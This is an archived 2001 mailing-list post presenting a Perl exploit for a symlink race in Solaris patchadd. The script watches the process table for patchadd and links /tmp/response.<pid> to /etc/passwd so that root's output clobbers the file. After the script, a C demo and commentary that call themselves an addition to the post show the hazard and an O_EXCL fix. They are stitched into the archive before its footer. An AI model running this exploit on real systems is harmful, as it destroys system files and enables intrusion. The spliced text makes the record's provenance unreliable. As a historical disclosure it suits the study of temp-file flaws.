Solaris Patchadd symlink exploit.

From: Larry W. Cashdollar (lwcat_private)
Date: Mon Aug 27 2001 - 09:17:52 PDT


    Here is an exploit for an old bug in patchadd on Solaris. It exploits a
    symlink vulnerability to clobber files with output from patchadd. This
    was written and tested on Solaris 2.8 SPARC with the current patch cluster
    applied.
    
    
    -- Larry
       http://vapid.dhs.org:8080
    <----Begin perl---------------------------------------------------------->
    
    #!/usr/local/bin/perl
    # Exploit for patchadd Solaris 2.x. Symlink /tmp file creation
    # vulnerability.
    # patchadd creates files in /tmp with mode 644 that can be used to clobber
    # system files when executed by root.
    # Larry W. Cashdollar
    # http://vapid.dhs.org:8080
    # See BID http://www.securityfocus.com/bid/2127
    # Discovery credit: Jonathan Fortin jfortinat_private
    # Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10

    use strict;
    use warnings;

    my $NOISY   = 1;             # set to 0 for quiet output
    my $clobber = "/etc/passwd"; # file that patchadd's output will overwrite

    print "Listening for patchadd process...\n" if $NOISY;

    # Poll the process table until a patchadd process appears, then plant the
    # symlink that its /tmp/response.<pid> output file will follow.
    while (1) {
        open(my $ps, '-|', 'ps -ef | grep -v grep | grep -v PID')
            or die "cannot run ps: $!";

        while (<$ps>) {
            my @args = split ' ', $_;   # $args[1] is the PID column of ps -ef

            if (/patch/) {
                print "Targeting PID $args[1] and symlinking response.$args[1] to $clobber\n"
                    if $NOISY;
                symlink($clobber, "/tmp/response.$args[1]")
                    or warn "symlink failed: $!";
                exit(1);
            }
        }
        close($ps);
    }
    
    <----end perl---------------------------------------------------------->
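The hazard the comment block above describes (a root process creating /tmp/response.<pid> with a plain open(2)) and the fix that belongs at that file-creation call, as an added C example that is not part of the original post: it plants the symlink inside a private scratch directory created with mkdtemp(), shows the create-or-truncate open following the link into the victim file, and shows an O_CREAT|O_EXCL open refusing the same path. The directory name, the PID 1234 and the file contents are constructed for the demo.

```c
/* Added example (not from the post): a root process creating /tmp/response.<pid>
 * with a plain open() is redirected by a planted symlink; O_CREAT|O_EXCL, the
 * rule mkstemp() applies, refuses it. Runs in a private mkdtemp() dir only. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create `path` with O_CREAT|flag and write `data` into it; 0 on success.
 * flag = O_TRUNC: the create-or-truncate pattern the post describes; open()
 *                 follows an existing symlink, so the data lands elsewhere.
 * flag = O_EXCL : hardened; open() fails with EEXIST if anything, a symlink
 *                 included, already exists at `path`. */
int create_and_write(const char *path, int flag, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | flag, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Return 1 if the content of `path` equals `expect` (short files only). */
static int file_equals(const char *path, const char *expect) {
    char buf[64] = {0};
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    return n >= 0 && strcmp(buf, expect) == 0;
}

/* Plant a victim file and response.1234 -> victim (PID 1234 is constructed),
 * then try both creation patterns on the link. Returns 1 when the O_TRUNC
 * open clobbered the victim and the O_EXCL open refused with EEXIST. */
int run_demo(void) {
    char dir[] = "/tmp/patchadd-demo.XXXXXX";   /* constructed scratch dir */
    if (!mkdtemp(dir)) return -1;
    char victim[300], link[300];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/response.1234", dir);
    if (create_and_write(victim, O_EXCL, "original\n") || symlink(victim, link))
        return -1;
    create_and_write(link, O_TRUNC, "clobbered\n");   /* the unsafe pattern */
    int clobbered = file_equals(victim, "clobbered\n");
    int refused = create_and_write(link, O_EXCL, "x") == -1 && errno == EEXIST;
    unlink(link); unlink(victim); rmdir(dir);
    return clobbered && refused;
}
```

The same O_EXCL refusal is what mkstemp(3) gives a program for free, which is why temporary files written by privileged tools should be created with it rather than with a predictable name and a truncating open.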
    This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 09:33:15 PDT